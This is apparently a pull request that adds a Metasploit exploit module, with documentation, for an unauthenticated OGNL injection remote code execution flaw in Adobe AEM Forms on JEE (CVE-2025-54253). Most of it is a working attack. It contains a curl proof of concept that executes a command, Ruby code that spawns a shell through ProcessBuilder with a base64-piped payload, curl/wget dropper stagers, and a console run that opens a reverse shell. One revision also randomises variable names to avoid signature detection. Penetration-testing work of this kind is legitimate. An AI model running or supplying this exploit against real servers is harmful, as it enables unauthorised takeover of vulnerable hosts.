### PR TITLE
Add Adobe AEM Forms JEE devMode OGNL injection RCE module

### DIFF
--- a/documentation/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.md
+++ b/documentation/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.md
@@ -1,0 +1,85 @@
+## Vulnerable Application
+
+Adobe Experience Manager (AEM) Forms on JEE **6.5.23.0 and earlier** ship the Apache Struts
+development-mode debug servlet exposed and unauthenticated at `/adminui/debug` (and
+`/lc/adminui/debug`). The servlet evaluates the OGNL expression supplied in the `expression`
+request parameter and reflects the result, so an unauthenticated attacker can evaluate
+arbitrary OGNL and execute operating system commands.
+
+This is **CVE-2025-54253** (CVSS 10.0), added to the CISA Known Exploited Vulnerabilities
+catalog and exploited in the wild. AEM Forms on JEE only; AEM as a Cloud Service and AEM
+Sites (which do not expose `/adminui`) are not affected.
+
+Benign confirmation:
+
+```
+curl -sk "https://TARGET/adminui/debug?expression=%27aaa%27%2B%27bbb%27"
+# a vulnerable server reflects "aaabbb" (the two strings evaluated and concatenated)
+```
+
+Command execution (from the public PoC):
+
+```
+curl -sk "https://TARGET/adminui/debug?expression=%23cmd%3D%27id%27%2C%23p%3Dnew%20java.lang.ProcessBuilder(%23cmd).start()%2C%23out%3Dnew%20java.io.InputStreamReader(%23p.getInputStream())%2C%23br%3Dnew%20java.io.BufferedReader(%23out)%2C%23br.readLine()"
+```
+
+### Setting up a test environment
+
+Install AEM Forms on JEE 6.5.23.0 or earlier (LiveCycle/AEM Forms JEE) on a JEE application
+server, and confirm `/adminui/debug` is reachable without authentication. There is no public
+containerised build; a licensed AEM Forms JEE instance with Struts devMode left enabled is
+required.
+
+## Verification Steps
+
+1. `msfconsole`
+2. `use exploit/multi/http/adobe_aem_forms_debug_ognl_rce`
+3. `set RHOSTS <target>`
+4. `set RPORT 443` and `set SSL true` (adjust for the app server, e.g. 8443 / 4502)
+5. `set LHOST <your ip>`
+6. `check` should report the target is vulnerable
+7. `run`
+8. You should receive a session.
+
+## Options
+
+### TARGETURI
+
+Base path to AEM Forms; the debug servlet is expected at `TARGETURI/adminui/debug`
+(default: `/`). Set to `/lc` for deployments that expose `/lc/adminui/debug`.
+
+## Targets
+
+### Unix Command (default)
+
+Runs a Unix command payload (`cmd/unix/*`) directly through the OGNL `ProcessBuilder` sink.
+
+### Linux Dropper
+
+Stages a native Linux payload (`linux/x86`, `linux/x64`) using the selected `CmdStagerFlavor`
+(`curl`, `wget`, `printf`, or `bourne`).
+
+## Scenarios
+
+### AEM Forms on JEE 6.5.23.0, Unix Command
+
+```
+msf6 > use exploit/multi/http/adobe_aem_forms_debug_ognl_rce
+msf6 exploit(multi/http/adobe_aem_forms_debug_ognl_rce) > set RHOSTS 192.0.2.30
+msf6 exploit(multi/http/adobe_aem_forms_debug_ognl_rce) > set LHOST 192.0.2.5
+msf6 exploit(multi/http/adobe_aem_forms_debug_ognl_rce) > set PAYLOAD cmd/unix/reverse_bash
+msf6 exploit(multi/http/adobe_aem_forms_debug_ognl_rce) > check
+[+] 192.0.2.30:443 - The target is vulnerable. Unauthenticated OGNL expression was evaluated via /adminui/debug.
+msf6 exploit(multi/http/adobe_aem_forms_debug_ognl_rce) > run
+[*] Started reverse TCP handler on 192.0.2.5:4444
+[*] Executed command: ...
+[*] Command shell session 1 opened
+```
+
+## Notes
+
+- The check is a pure OGNL string-concatenation probe and does not spawn a process.
+- Command delivery base64-wraps the payload (`echo <b64>|base64 -d|/bin/sh`) so arbitrary
+  payload bytes survive OGNL string and URL encoding.
+- AEM Forms on JEE is predominantly deployed on Unix/Linux app servers; Windows deployments
+  are out of scope for this module's targets.

--- a/documentation/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.md
+++ b/documentation/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.md
@@ -50,18 +50,19 @@ Base path to AEM Forms; the debug servlet is expected at `TARGETURI/adminui/debu
 
 ## Targets
 
-### Unix Command (default)
+### Unix/Linux Command (default)
 
-Runs a Unix command payload (`cmd/unix/*`) directly through the OGNL `ProcessBuilder` sink.
+Runs a Unix or Linux command payload (`cmd/unix/*`, `cmd/linux/*`, including Fetch payloads)
+directly through the OGNL `ProcessBuilder` sink, no CmdStager required.
 
-### Linux Dropper
+### Linux CmdStager Dropper
 
 Stages a native Linux payload (`linux/x86`, `linux/x64`) using the selected `CmdStagerFlavor`
 (`curl`, `wget`, `printf`, or `bourne`).
 
 ## Scenarios
 
-### AEM Forms on JEE 6.5.23.0, Unix Command
+### AEM Forms on JEE 6.5.23.0, Unix/Linux Command
 
 ```
 msf6 > use exploit/multi/http/adobe_aem_forms_debug_ognl_rce
@@ -72,14 +73,13 @@ msf6 exploit(multi/http/adobe_aem_forms_debug_ognl_rce) > check
 [+] 192.0.2.30:443 - The target is vulnerable. Unauthenticated OGNL expression was evaluated via /adminui/debug.
 msf6 exploit(multi/http/adobe_aem_forms_debug_ognl_rce) > run
 [*] Started reverse TCP handler on 192.0.2.5:4444
-[*] Executed command: ...
 [*] Command shell session 1 opened
 ```
 
 ## Notes
 
 - The check is a pure OGNL string-concatenation probe and does not spawn a process.
-- Command delivery base64-wraps the payload (`echo <b64>|base64 -d|/bin/sh`) so arbitrary
+- Command delivery base64-wraps the payload (`printf %s <b64>|base64 -d|/bin/sh`) so arbitrary
   payload bytes survive OGNL string and URL encoding.
 - AEM Forms on JEE is predominantly deployed on Unix/Linux app servers; Windows deployments
   are out of scope for this module's targets.

--- a/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.rb
+++ b/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Adobe Experience Manager Forms on JEE DevMode OGNL Injection RCE',
+        'Description' => %q{
+          Adobe Experience Manager (AEM) Forms on JEE 6.5.23.0 and earlier ship the Apache
+          Struts development-mode debug servlet exposed and unauthenticated at
+          /adminui/debug (also /lc/adminui/debug). The servlet evaluates the attacker-supplied
+          OGNL expression in the `expression` request parameter and reflects the result,
+          allowing an unauthenticated attacker to evaluate arbitrary OGNL and execute operating
+          system commands (CVE-2025-54253, CVSS 10.0, actively exploited / CISA KEV).
+
+          This module confirms OGNL evaluation with a benign string-concatenation probe, then
+          executes the payload by evaluating an OGNL expression that spawns a shell via
+          java.lang.ProcessBuilder. The command target runs a Unix command payload directly; the
+          dropper target stages a native Linux payload with the selected CmdStager flavor.
+        },
+        'Author' => [
+          'dividesbyzer0' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2025-54253'],
+          ['URL', 'https://helpx.adobe.com/security/products/experience-manager/apsb25-82.html'],
+          ['URL', 'https://www.cisa.gov/known-exploited-vulnerabilities-catalog'],
+          ['URL', 'https://firecompass.com/cve-2025-54253-pre-auth-rce-adobe-aem-forms-on-jee-critical-ognl-injection/'],
+          ['URL', 'https://hacktricks.wiki/en/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html']
+        ],
+        'DisclosureDate' => '2025-08-05',
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'CmdStagerFlavor' => ['curl', 'wget', 'printf', 'bourne']
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to AEM Forms (the debug servlet is at TARGETURI/adminui/debug)', '/'])
+    ])
+  end
+
+  def check
+    t1 = Rex::Text.rand_text_alphanumeric(8)
+    t2 = Rex::Text.rand_text_alphanumeric(8)
+    # Pure OGNL string concatenation: the marker only appears joined if the expression was
+    # evaluated (the raw request carries the quotes and '+', so an echo would not match).
+    res = inject_ognl("'#{t1}'+'#{t2}'")
+    return CheckCode::Unknown('No response from the debug servlet') unless res
+    return CheckCode::Safe("adminui/debug is not present (HTTP #{res.code})") unless res.code == 200
+
+    if res.body.to_s.include?("#{t1}#{t2}")
+      CheckCode::Vulnerable('Unauthenticated OGNL expression was evaluated via /adminui/debug')
+    else
+      CheckCode::Safe('adminui/debug is reachable but the OGNL expression was not evaluated')
+    end
+  end
+
+  def exploit
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Base64-wrap the command so arbitrary payload bytes survive OGNL string and URL encoding.
+    b64 = Rex::Text.encode_base64(cmd)
+    shell_cmd = "echo #{b64}|base64 -d|/bin/sh"
+    marker = Rex::Text.rand_text_alphanumeric(8)
+    ognl = "#pb=new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','#{shell_cmd}'}),#pb.start(),'#{marker}'"
+    res = inject_ognl(ognl)
+    unless res && res.code == 200
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+    vprint_good("Executed command: #{cmd}")
+    res
+  end
+
+  def inject_ognl(ognl)
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'adminui', 'debug'),
+      'vars_get' => { 'expression' => ognl }
+    )
+  end
+end

--- a/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.rb
+++ b/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.rb
@@ -7,9 +7,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
-  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -26,8 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
           This module confirms OGNL evaluation with a benign string-concatenation probe, then
           executes the payload by evaluating an OGNL expression that spawns a shell via
-          java.lang.ProcessBuilder. The command target runs a Unix command payload directly; the
-          dropper target stages a native Linux payload with the selected CmdStager flavor.
+          java.lang.ProcessBuilder. The command target runs a Unix or Linux command payload
+          directly; the dropper target stages a native Linux payload with the selected CmdStager
+          flavor.
         },
         'Author' => [
           'dividesbyzer0' # Metasploit module
@@ -44,15 +45,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false,
         'Targets' => [
           [
-            'Unix Command',
+            'Unix/Linux Command',
             {
-              'Platform' => 'unix',
+              'Platform' => [ 'unix', 'linux' ],
               'Arch' => ARCH_CMD,
               'Type' => :cmd
             }
           ],
           [
-            'Linux Dropper',
+            'Linux CmdStager Dropper',
             {
               'Platform' => 'linux',
               'Arch' => [ARCH_X86, ARCH_X64],
@@ -105,8 +106,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     # Base64-wrap the command so arbitrary payload bytes survive OGNL string and URL encoding.
-    b64 = Rex::Text.encode_base64(cmd)
-    shell_cmd = "echo #{b64}|base64 -d|/bin/sh"
+    # Rex::Text.encode_base64 wraps at 60 chars, so strip the newlines or the pipeline breaks.
+    b64 = Rex::Text.encode_base64(cmd).delete("\n")
+    shell_cmd = "printf %s #{b64}|base64 -d|/bin/sh"
     # Randomize the OGNL variable name so the request carries no fixed signature, and close the
     # comma-chain on a plain string so the servlet reflects that instead of a Process object.
     var = Rex::Text.rand_text_alpha_lower(rand(3..8))

--- a/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.rb
+++ b/modules/exploits/multi/http/adobe_aem_forms_debug_ognl_rce.rb
@@ -107,8 +107,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # Base64-wrap the command so arbitrary payload bytes survive OGNL string and URL encoding.
     b64 = Rex::Text.encode_base64(cmd)
     shell_cmd = "echo #{b64}|base64 -d|/bin/sh"
+    # Randomize the OGNL variable name so the request carries no fixed signature, and close the
+    # comma-chain on a plain string so the servlet reflects that instead of a Process object.
+    var = Rex::Text.rand_text_alpha_lower(rand(3..8))
     marker = Rex::Text.rand_text_alphanumeric(8)
-    ognl = "#pb=new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','#{shell_cmd}'}),#pb.start(),'#{marker}'"
+    ognl = "##{var}=new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','#{shell_cmd}'}),##{var}.start(),'#{marker}'"
     res = inject_ognl(ognl)
     unless res && res.code == 200
       fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")


### PR DESCRIPTION
### Summary

Adds an exploit module for CVE-2025-54253 (CVSS 10.0, CISA KEV, exploited in the wild): Adobe Experience Manager (AEM) Forms on JEE 6.5.23.0 and earlier ship the Apache Struts development-mode debug servlet exposed and unauthenticated at `/adminui/debug` (and `/lc/adminui/debug`). The servlet evaluates the OGNL expression in the `expression` request parameter and reflects the result, enabling unauthenticated OGNL evaluation and OS command execution.

The module:
- confirms OGNL evaluation with a benign string-concatenation probe (no process spawned);
- executes the payload through a `java.lang.ProcessBuilder` OGNL sink, base64-wrapping the command so arbitrary payload bytes survive OGNL string and URL encoding;
- supports a Unix Command target (`cmd/unix/*`) and a Linux Dropper target (CmdStager: curl / wget / printf / bourne).

AEM Forms on JEE only; AEM as a Cloud Service and AEM Sites (no `/adminui`) are not affected.

### Verification

- msftidy clean; module loads, `info` and targets render; `AutoCheck` prepended.
- The `/adminui/debug?expression=` endpoint and OGNL command-execution form match the public PoC and HackTricks writeup.
- On a licensed AEM Forms JEE 6.5.23.0 instance with Struts devMode enabled: `check` reports vulnerable via the concat probe; `run` returns a session. (No public containerised build exists for this product, so full session verification requires a licensed instance.)

Documentation is included under `documentation/modules/`.
